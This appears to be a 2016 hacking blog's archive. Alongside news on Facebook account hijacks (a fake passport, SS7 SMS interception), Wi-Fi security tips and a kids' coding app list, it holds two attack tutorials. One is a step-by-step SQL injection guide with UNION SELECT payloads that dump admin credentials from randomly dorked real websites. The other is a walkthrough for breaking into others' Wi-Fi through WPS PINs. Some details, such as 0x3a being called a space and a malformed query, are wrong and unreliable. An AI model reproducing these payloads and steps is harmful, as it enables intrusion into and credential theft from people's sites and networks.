Friday, 21 October 2016

How a hacker stole a Facebook user's account with just a fake passport

A hacker successfully commandeered a Facebook user's profile by conducting a social engineering attack that involved a fake passport.

The hack occurred on June 26 when an unidentified attacker contacted the Facebook support team posing as Aaron Thompson, a legitimate Facebook user and resident of Michigan in the United States.

The hacker's original message reads:
Hi. I don't have anymore access on my mobile phone number. Kindly turn off code generator and login approval from my account. Thanks
In its response, Facebook provided the hacker with a few recommendations for how they could regain access. They also said the Thompson poser could provide Facebook with two things if it still wasn't possible to access the profile: a scan of a photo ID and a description of the issue being experienced.

The attacker replied with this fake passport.

Facebook could have easily determined that none of the details provided in the passport match the real Aaron Thompson's profile.

Still, it was enough for the site's support staff, who disabled Thompson's login approval settings and granted the hacker access to the account.

Facebook sent a message to the email address attached to Thompson's profile explaining the change in his account settings:

It was then that Thompson first learned of the hack.

But, by then, the attacker had already gained access to Thompson's account, including his access to several business pages he managed on Facebook.

Motherboard reports Thompson is convinced the hacker targeted him in an attempt to monetize his pages.

But the attacker did no such thing. Instead he sent out only a few messages to the hacked user's friends. Most notably, he sent an image of his genitals to the victim's girlfriend.

Thompson contacted Facebook support but initially experienced some difficulty in resolving the issue. Frustrated, he decided to share his story on Reddit, where he said he was "pretty devastated" about the "blatant harassment" the hacker had perpetrated against him and his social circle.

Shortly thereafter, Facebook's support team stepped it into high gear and helped Thompson regain access to his account and business pages.

A Facebook spokesperson said the incident should never have happened:
Accepting this ID was a mistake that violated our own internal policies and this case is not the norm.
Clearly, no matter how many security features we might enable on our accounts, including two-step verification (2SV), human error can still threaten our account security.

That's why companies like Facebook should continuously review and update their security policies, not to mention regularly train their employees to not fall for a social engineering attack like the one that locked Thompson out of his account.

Thursday, 25 August 2016

Hacking website using SQL Injection -step by step guide

Before leaning how to exploit website with SQL Injection, let’s first to try learn the core methodologies and the abstraction behind the scenes.
What is SQL Injection?
SQL Injection is a malicious attack where malicious users can inject SQL commands (commonly referred to as malicious payload) in SQL statement that controls the web application database (commonly referred to as Relational Database Management System – RDBMS), within the web input field.

The SQL injection vulnerability can damage any website or web application that is currently using SQL-based database. This is one of the most dangerous web attack where the malicious users tend to exploit the web applications.

The malicious users can get unauthorized access to the web application, by making use of the SQL injection to bypass the authentication and authorization mechanism defined by any web application. This vulnerability in web applications give illegal access to the malicious user to modify, update or delete the database or make changes to any particular row and columns, in result the data integrity of SQL-based database should be affected.

How SQL Injection Works?
To exploit a web application, malicious users must have to find an input field that lies in the SQL query of the database.

In order for an SQL injection attack to take place, the vulnerable website needs direct user input in the SQL query that is injected in the SQL statement. In this way the malicious users inject a payload that is included in SQL query and hence it should be used to attack against the database server.

Before the actual attack, first check how the server responds to user’s input for authentication mechanism.
// define POST variables
$Uname = $_POST['name'];
 $Upassword = $_POST['password'];

// sql query vulnerable to SQLi
 $sql = "SELECT id from users where username = 'Uname' && password = 'Upassword' ";

// execute the sql query by database
This was an example of how the user’s authentication credentials are checked or verified by the database server.

As shown the above code is vulnerable to SQL injection, the malicious user can gain access to the web application by submitting the malicious payload in the SQL query that would alter the SQL statement being executed by the database server.

A simple example of an SQL injection payload could be something as simple as setting the password field to
password’ OR '1'='1' 
where this condition is always true.

This would result in the following SQL query being run against the database server.
SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’
What’s the worst an attacker can do with SQL?
SQL (Structured Query Language) is a programming language used to work with the databases, commonly Relational Database Management Systems are brought into work.

SQL language can be used to update, modify or delete the databases or the tables, columns, rows within RDBMS databases.

It is a powerful language to attack databases itself. Attackers can use this language to exploit databases of the web applications and take control of the application without the Administrator’s consent.

Keeping the above in mind, when considering the following, it’s easier to understand how lucrative a successful SQL injection attack can be for an attacker.

  • An attacker can use SQL injection to bypass authentication or even impersonate specific users.
  • SQL is used to delete records from a database. So an attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an application’s availability until the database is restored.
  • One of SQL’s primary functions is to select data based on a query and output the result of that query. An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.
  • Since web applications use SQL to alter data within a database, an attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.
  • Some database servers are configured (intentional or otherwise) to allow arbitrary execution of operating system commands on the database server. Given the right conditions, an attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.
Practical Attack On Website With SQL Injection:
It will be easier to understand the exploitation of website using SQL injection, if you already have some idea about what all the SQL injection is. So let’s move on and search for a real hacking environment.

We will move on step by step to keep the simplicity in achieving our goals.

Step 1
Search for Google Dorks.

Following are some of the dorks, I just gathered. There are quite number of dorks you can search on your own.


These are some basic dorks but you can make your own custom dorks to find websites.

Using such dorks you can easily find which sites are vulnerable to SQL injection so you can bypass the authentication.

Step 2
Okay, if you got the vulnerable number of websites, just open one of them to check whether they are still possible for SQL injection.

In my case, I chose the following website for implementation of SQL injection.

Of course, it is random site. Make sure you choose some other website.

Note: This is just for educational Purpose. I’ve nothing to do with your actions.

Let’s check whether the website I have chosen is vulnerable to SQL injection or not.

So paste the link in the search bar with apostrophe (‘) in the end of link and press enter.

If we get the description like below after pressing enter, then it shows that the website is vulnerable to SQL injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
That’s good the website is vulnerable so move on. Follow the steps.

Step 3
Now its time to check how many columns the database of particular website has. Make an arbitrary attempt to check the number of columns. order by 34–

Keep in mind you have to put the query in URL as it is, contrary to what you website link is. ‘Order by’ is the SQL command used to order the number of columns from the database. Here 34 is an arbitrary number, if we put this the following command is executed.
Unknown column '34' in 'order clause'
And if we put the link below in URL, order by 33–

This works correctly we are redirected to the website home page.

So the number of columns in the database of particular website is 33.

Step 4
Use the following query. union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33–

Now this query show 12 which is bold displayed on the screen, so in the place of 12 you can write @@Version, that would give the version of SQL database used by the website. union all select 1,2,3,4,5,6,7,8,9,10,11,@@Version,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33–

Step 5
Use the below query and focus I have wrote ‘group_concat(table_name)’ on the place of column#12 and some string in the last. union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.tables where table_schema=database()–

Now this query give the names of database tables. Just copy them if you need it further in your scenario.

Step 6
Use the below query to find the column names in the database, by changing the table to column in the fields. union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()–

After entering the query we will get the column names of the different tables.

Step 7
In the previous step we got the column names so search for the column that is credential and should be used in retrieving sensitive data e.g username and password are the columns that could obviously give access to the database.

Use the following query: union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(username,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin–

In the group_concat() method we passed username then 0x3a which is used for space and then the other column name. In the end we removed the query and wrote from admin table, it means that we are using the column names from admin table.

Congratulations, you did it.

Search for the website login page and put the credentials in the fields.

Final Words:
First of all we searched for the Google dork, the vulnerable website.

Pasted apostrophe at the end of link to check if it it vulnerable.

Searched for the available number of columns.

Searched for the version of SQL database.

Searched for the table names.

Searched for the column names of all the tables.

Chosen the sensitive columns and fetched the sensitive data from them.

Searched for the login page of the website.

Used the hacked usernames and passwords for authentication mechanism.

Note: The tutorial was for educational purposes.

Thursday, 11 August 2016

Check Out These Clever Apps for Teaching Your Kids to Hack

When your kid starts talking about loops, go-to commands, and branches, it probably means she's learning to code, and that's a very good thing. In a technology-fueled world, coding is quickly becoming a prized, 21st-century skill. Plus, it encourages kids to become creators, not just consumers, of the technology they use.
Coding apps come in a range of formats designed for different ages and abilities. They often incorporate bright colors, cute characters, and elements of game design to appeal to kids. Beginners typically learn to create programs by dragging and dropping visual blocks of code. Intermediate users are ready for kid-friendly programming languages, specially designed to train newbies. Advanced coders can start working with real programming languages that have a more gradual learning curve than what the pros use -- but still produce sophisticated results.

Whatever your kid's level, there's a tool that will get her behind the computer curtain to actually create content.

Younger Kids

The Foos: Code for an Hour FREE. 5+
Story-based coding game has kids play through increasingly challenging levels.

Kodable Pro. 6+
Solid beginner game that introduces coding concepts and has lots of parent resources.

ScratchJr. 6+
Kids drag and drop blocks of code, snap them together, and watch them work.

Tynker. 7+
Use either the website or app to let your kids learn coding logic through games.

Cato's Hike. 8+
Through it's a story-based adventure, kids learn basic coding concepts.

Scratch. 8+
After creating scripts through coding blocks, kids can share their creations online.

Older Kids

Hopscotch. 10+
Appealing interface draws in boys and girls who can share creations with online community.

Lightbot. 10+
By meeting programming goals, kids unlock new levels and learn more advanced concepts.

Mozilla Thimble. 12+
Advanced, side-by-side coder lets kids see what programming codes do as they create.

Codecademy. 13+
Interactive lessons for several programming languages offer several skill-level tracks.

CodeHS. 15+
Membership service offers instruction and examples for more advanced coders.

Hack any WPA2/WEP/WPA Wifi using Dumpper and Jumpstart

Step By Step Guide To Using WinPcap, Dumpper And JumpStart and Get Password:
Download the Dumpper File Here (I realized this version was in Spanish and didn’t have the option to switch languages, so I found an English translated version here.)

WinPcap: Download here

JumpStart: Download here

NOTE: You need to have Microsoft .NET Framework installed on your computer as well, or this will not work. You can install Microsoft .NET Framework here.

Disclaimer: I (The creator of the video has already stated this, but I’d like to go over it again) do not take any responsibility for your actions regarding this tutorial. This was made by the creator to demonstrate weaknesses in wireless networks and for educational purposes only. Breaching other people’s wireless networks without permission is against the law. If you want to test this tutorial, try it on your own home network.
We will be using Dumpper and Jumpstart and other suites to hijack WPA2/WEP/WPA WiFi networks. It’ll let you join without a password, then you can get the password from inside the network. I’ll show you how towards the end of the tutorial. First, download all of the programs above. Now, follow these instructions for setting it up:

Note: Dont STOP the Process. It Takes Several Minutes . Probably 4~5 Hours.(Works Only in Laptops).
Update: We have also Added the Process to Hack Wifi in Desktops Below.

Hack WiFi with Dumpper and Jumpstart:
  1. Download and install JumpStart, WinPcap, and Dumpper
  2. Open Dumpper. It’ll be in Spanish, so go to the far right tab and select ‘English’ in between the other two options.Your programs are set up and ready to go, now begin the process:
  3. In the ‘Networks’ tab, select the network adapter you wish to use. Hit the ‘Scan’ button now.
  4. After it completes the scan, go over to the ‘Wps’ tab. In the area that says ‘Connect using JumpStart’, hit ‘Browse’ to select the location of where you installed JumpStart in the previous set-up steps. (By default, it installs in C:\Program Files (x86)\Jumpstart. Don’t open it, just select the ‘Jumpstart’ folder and click ‘OK’)
  5. In the area ‘Show default pin’, select ‘All networks’ isntead of ‘Only known networks’.
  6. Hit the ‘Scan’ button.
  7. Select the network you wish to penetrate. Remember the ‘Pin’ corresponding to your network in the scan results, this will be needed for later.
  8. In the previous area ‘Connect using Jumpstart’, hit the ‘Start JumpStart’ button.
  9. Under ‘What do you want to do?’, select ‘Join a wireless network’ and hit ‘Next’
  10. Under ‘Which setup method do you want to use?’, select “Enter the PIN from my access point” and enter the PIN next to your network in the scan section back in the previous scan results.
  11. Finally, select the targeted network from before and hit ‘Next’.Now you’re happily connected to that WiFi network you just penetrated. Do you want to see the password so you can get on from other devices without doing this process? Sure! Follow these simple steps:
  12. Open the menu where you join WiFi networks/view the network you’re connected to.
  13. Right click on the network you just joined and hit ‘Properties’
  14. Under the ‘Security’ tab, you can see the password, but it’s just dots. Check the ‘Show characters’ box under it.
  15. The password will then reveal itself.

Hacking The Wifi on Desktops?
So Many People are Doing this Hack in their Desktops.But unfortunately Desktops are not compatible for using this Hack.But Don’t worry, Here is the trick to do the same Hacking process in Destops even.You just need to buy the Wireless Adapter and Install it in your desktop.

It is worth the product and it is only last thing you need.After getting the Product Proceed as Above to hack WiFi with Dumpper and Jumpstart.You will not regret it later for buying.

Doubts? Please use the comments section and feel free to ask any question. I will definitely get it solved.

Thursday, 4 August 2016

Secure wireless network: top tips for secure Wi-Fi

Most companies go to great lengths to keep unauthorised users off their networks, but Wi-Fi access points can provide hackers with a convenient way in. That's because Wi-Fi signals are often broadcast beyond the walls of the company and out into the streets - an enticing invitation for hackers.
Since many companies allow or even actively encourage employees to connect to the network using their own mobile devices - tablets and smartphones as well as laptops - it's not practical for most companies to switch off Wi-Fi access. Instead, here are five tips to make your wireless network more secure

1.Use WPA
Some Wi-Fi access points still offer the older WEP (Wired Equivalent Privacy) standard of protection, but it is fundamentally broken. That means that hackers can break in to a WEP-protected network using a hacking suite like Aircrack-ng in a matter of minutes.

So to keep out intruders, it's essential to use some variant of WPA (Wi-Fi Protected Access) protection, either WPA or the newer WPA2 standard.

For smaller companies it may be practical to use WPA with a pre-shared key. That means that all employees use the same password to connect, and network security depends on them not sharing the password with outsiders. It also means that the password should be changed every time an employee leaves the company.

Some Wi-Fi routers offer a feature called Wireless Protect Setup (WPS) which provided an easy way to connect devices to a WPA protected wireless network. However, this can be exploited by hackers to retrieve your WPA password, so it is important to disable WPS in the router's settings.

In larger organisations it makes more sense to use WPA in enterprise mode, which allows each user to have their own username and password to connect to the Wi-Fi network. This makes it much easier to manage when employees are leaving regularly, as you can simply disable ex-employees' accounts; but to use WPA in enterprise mode you have to run a server (known as a RADIUS server) which stores the login information for each employee.

2.Use a secure WPA password
Make sure that any password (or passphrase) that protects your Wi-Fi network is long and random so it can't be cracked by a determined hacker.

You can test the security of your WPA protected network (without revealing your password or passphrase) by using the CloudCracker service. You'll be asked to provide some data (the same data that a hacker could capture or "sniff" out of the air with a laptop from anywhere in range of your network) and the service will attempt to extract your password.

If the service is unsuccessful then a hacker is unlikely to be successful either. But if the service finds your password then you know that you need to choose a longer, more secure one.

3.Check for rogue Wi-Fi access points
Rogue access points present a huge security risk. These aren't your company's "official" Wi-Fi access points, but ones that have been brought in by employees (perhaps because they can't get a good Wi-Fi signal in their office,) or conceivably by hackers who have entered your building and surreptitiously connected one to an Ethernet point and hidden it.

In either case, rogue access points present a risk because you have no control over them or how they are configured: for example, one could be set up to broadcast your SSID (the 32 character identifier for a wireless network) and allow anyone to connect without providing a password.

To detect rogue access points you need to scan your offices and the area around it on a regular basis using a laptop of mobile device equipped with suitable software such as Vistumbler or airodump-ng. These programs allow the laptop to "sniff" the airwaves to detect any wireless traffic travelling to or from a rogue access point, and help you identify where they are located.

4.Provide a separate network for guests
If your business allows visitors to use Wi-Fi, it's sensible to offer a guest network. This means that they can connect to the internet without getting access to your company's internal network. This is important both for security reasons, and also to prevent them inadvertently infecting your network with viruses or other malware.

One way to do this is by using a separate internet connection with its own wireless access point. In fact this is rarely necessary as most business grade wireless routers have the capability of running two Wi-Fi networks at once - your main business network, and another for guests (often with the SSID "Guest".)

It makes sense to turn on WPA protection on your guest network - rather than leave it open - for two important reasons. The first is to provide some level of control over who uses it: you can provide the password to guests on request, and as long as you change it frequently you can prevent the number of people who know the password growing too large.

But more importantly, this protects your guests from other people on the guest network who may try to snoop on their traffic. That's because even though they are using the same WPA password to access the network, each user's data is encrypted with a different "session key," which keeps it safe from other guests.

5.Hide your network name
Wi-Fi access points are usually configured by default to broadcast the name of your wireless network - known as the service set identifier, or SSID - to make it easy to find and connect to. But the SSID can be also be set to "hidden" so that you have to know the name of the network before you can connect to it.

Given that employees should know the name of your company Wi-Fi network, it makes no sense to broadcast it so that anyone else who happens to be passing by can easily find it too.

It's important to note that hiding your SSID should never be the only measure you take to secure your Wi-Fi network, because hackers using Wi-Fi scanning tools like airodump-ng can still detect your network and its SSID even when it is set to "hidden."

But security is all about providing multiple layers of protection, and by hiding your SSID you may avoid attracting the attention of opportunistic hackers, so it is a simple measure that is worth taking.

Tips for Keeping your Small Business Secure from Hackers

As business is increasingly done online, and more important information stored digitally, the risk and potential damage of cyber attack increase. Your website might be taken down, e-mail, client, employee, and credit card information all might be stolen, or erased. Any of the above can damage your business serious damage. Rather then seeking to repair such damage after the fact, it’s best to do all that you can to prevent it. That’s why Working Nets, Inc. Is here with a guide to help you improve your businesses cyber security.
Ensure you Employees are Trained in Cyber Security:
Make sure you and your employees know safe practices to protect your companies equipment, digital assets, and information. Require strong passwords consisting of uppercase letters, lowercase letters, numbers and symbols over nine characters long. Institute strict rules for employees defining what acceptable internet use is, and what is not. Establish and adhere to penalties for practices that violate your cyber security rules. Ensure that your employees also know how to keep customer information safe.  Without the proper cyber security training, your employees represent the greatest risk to your business, with it, they are its greatest defense.

Keep your Network and Machines Protected:

Employees trained in cyber security reduce the risk of your business being the victim of cyber attacks. However, even if you reduce the risk, there’s still a chance that a cyber attack can happen. That’s why it’s important to make sure all the devices in your office have security software, your network has firewall protection, and that it’s all up to date.

Install anti-malware and anti-virus programs on your company computers. Make sure mobile devices, such as smart phones, have cyber security apps and that your employees know safe practices for using their devices. Have two wireless networks, one for employees and one for customers, and make sure all of your networks are firewall protected.

No cyber security program, operating system, or firewall is perfect. Hackers are constantly looking for exploits in these systems so that they can break into cyber systems.  As hackers look for exploits, cyber security specialists are doing their best to find them and fix them first. That’s why it’s essential that all of your machines and their security programs stay up to date.

Protect Your Business With Working Nets:
Contact Working Nets. We know that handling the cyber security for a business while actually keeping that business running can seem impossible. Outsourcing your IT can give you peace of mind and allow you to take care of the things that are important for your company. Working Nets is a Maryland based IT Service and Security company that services small businesses nationwide. We’re always on top of emerging cyber security trends and threats so you don’t have to be.

To talk to someone about managed IT for your business, give us a call at (443) 992-7394. We’d be happy to assist you with your professional business networking needs.

Monday, 1 August 2016

How to Hack Facebook Account Using Victim Phone Numbers

Every one ask about How to Hack Facebook Account and normal People ask How to Secure Facebook Account, between Hacking and Security they are a long way to go!
On 2016 the methodes of Hacking are developed and secutity too, and Hacking Facebook account is one of the major queries on the Internet today. It's hard to find, but researchers have just proven by taking control of anyFacebook account with only the target's phone number and some hackingskills.
Yes, your Facebook account can be hacked, no matter how strong yourpassword is or how much extra security measures you have taken. No joke!

Even where users have chosen strong passwords and taken extra security measures, their Facebook FB -0.29% accounts are not safe from hackers. Hackers with skills to exploit the SS7 network can hack your Facebook account. All they need is your phone number.

The researchers from Positive Technologies, who recently showed how they could hijack WhatsApp and Telegram accounts, now gave the demonstration of the Facebook hack using similar tricks, Forbes reported.

What is SS7?
Signalling System No. 7 (SS7) is a set of telephony signaling protocols developed in 1975, which is used to set up and tear down most of the world's public switched telephone network (PSTN) telephone calls. It also performs number translation, local number portability, prepaid billing, Short Message Service (SMS), and other mass market services.

What does SS7 normally do?

SS7 is a set of protocols allowing phone networks to exchange the information needed for passing calls and text messages between each other and to ensure correct billing. It also allows users on one network to roam on another, such as when travelling in a foreign country.
SS7 has long been known to be vulnerable, despite the most advanced encryption used by cellular networks. The designing flaws in SS7 have been in circulation since 2014 when the team of researchers at German Security Research Labs alerted the world to it.

Here’s How to Hack Any Facebook Account:

The attacker first needs to click on the "Forgot account?" link on the homepage. Now, when asked for a phone number or email address linked to the target account, the hacker needs to provide the legitimate phone number.

The attacker then diverts the SMS containing a one-time passcode (OTP) to their own computer or phone, and can login to the target’s Facebook account.

You can watch the video demonstration that shows the hack in action.
The issue affects all Facebook users who have registered a phone number with Facebook and have authorized Facebook Texts.

Besides Facebook, researchers’ work shows that any service, including Gmail and Twitter, that uses SMS to verify its user accounts has left open doors for hackers to target its customers.

Although the network operators are unable to patch the hole sometime soon, there is little the smartphone users can do.
  • Do not link your phone number to social media sites, rather rely solely on emails to recover your Facebook or other social media accounts.
  • Use two-factor authentication that does not use SMS texts for receiving codes.
  • Use communication apps that offer "end-to-end encryption" to encrypt your data before it leaves your smartphone over your phone's standard calling feature.